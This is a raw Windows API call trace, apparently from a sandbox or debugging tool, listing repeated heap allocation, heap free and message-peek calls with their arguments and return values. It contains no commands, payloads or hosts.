[0203.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0203.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0203.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0203.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0203.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0203.203] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0203.203] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0203.203] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0203.204] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0203.204] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0203.204] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.204] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0203.204] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.204] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0203.205] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0203.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0203.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0203.205] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0203.205] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0203.206] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0203.206] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0203.206] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0203.206] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0203.207] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0203.207] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0203.207] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0203.208] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0203.208] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0203.208] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.208] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.208] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0203.208] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0203.209] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0203.209] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.209] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0203.209] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.209] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0203.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0203.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0203.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0203.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0203.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.210] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0203.210] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.210] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0203.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0203.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0203.211] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0203.211] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.211] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.211] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0203.212] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffff0 [0203.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7010 [0203.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe30 [0203.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7010 | out: hHeap=0x12c0000) returned 1 [0203.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300040 [0203.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7010 [0203.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7088 [0203.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7088 | out: hHeap=0x12c0000) returned 1 [0203.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efef0 [0203.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f80 [0203.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efef0 | out: hHeap=0x12c0000) returned 1 [0203.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f80 | out: hHeap=0x12c0000) returned 1 [0203.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x13166c0 [0203.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6fb0 [0203.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0090 [0203.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x84) returned 0x132cf00 [0203.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f98 [0203.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ec0 [0203.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70b8 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f08 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7028 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6fe0 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ef0 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7040 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f20 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7088 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f50 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f38 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70a0 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6ed8 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f68 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6dd0 [0203.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6f80 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6de8 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e00 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e18 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e30 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e48 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e60 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6e90 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ea8 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7160 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7118 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70d0 [0203.215] 